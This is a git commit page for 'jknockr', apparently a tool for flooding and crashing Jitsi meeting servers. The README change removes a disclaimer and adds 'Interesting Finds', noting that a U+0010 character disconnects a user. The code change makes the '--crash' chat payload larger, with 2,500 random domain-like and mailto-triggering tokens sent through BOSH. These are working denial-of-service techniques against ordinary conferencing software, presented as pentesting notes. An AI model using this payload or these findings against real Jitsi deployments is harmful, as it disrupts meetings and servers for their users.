Added interesting finds when pentesting Jitsi and added mailto link usage in --crash

This commit is contained in:
Dionysus 2024-10-12 22:50:35 -04:00
parent 44e79eef56
commit 29ecb16fdc
Signed by: acidvegas
GPG Key ID: EF4B922DB85DC9DE
2 changed files with 6 additions and 5 deletions

View File

@ -72,9 +72,10 @@ python3 jknockr.py <target> [options]
- **Server Impact:** Running this script can significantly impact server performance. Monitor your server resources during testing. - **Server Impact:** Running this script can significantly impact server performance. Monitor your server resources during testing.
- **Legal Responsibility:** You are responsible for ensuring that your use of this script complies with all applicable laws and terms of service. - **Legal Responsibility:** You are responsible for ensuring that your use of this script complies with all applicable laws and terms of service.
## Disclaimer ## Interesting Finds
- Sending a [U+0010](https://unicode-explorer.com/c/0010) character disconnects you from the room. Same with using as your name.
The developer provides this script "as is" without any warranties. Use it at your own risk. The developer is not responsible for any damage or misuse of this script. - Unicode in a URL is converted to puny code. *(`𓆨.中国` only 4 characters you send to the chat & itll convert to `xn--907d.xn--fiqs8s`)*
- Using @ in a URL converts it to a `mailto://`
___ ___

View File

@ -155,7 +155,7 @@ def client_join(client_id: int, tlds: list, args: argparse.Namespace, video_id:
if not tlds: if not tlds:
print(f'Client {client_id}: TLD list is empty. Using default TLDs.') print(f'Client {client_id}: TLD list is empty. Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io'] tlds = ['com', 'net', 'org', 'info', 'io']
msg = ' '.join(f'{random_word(5)}.{random.choice(tlds)}' for _ in range(2500)) msg = ' '.join( f'{random_word(2)}@{random_word(2)}.{random.choice(tlds)}' if random.choice([True,False]) else f'{random_word(4)}.{random.choice(tlds)}' for _ in range(2500))
elif args.message: elif args.message:
msg = args.message msg = args.message
message_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'> message_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>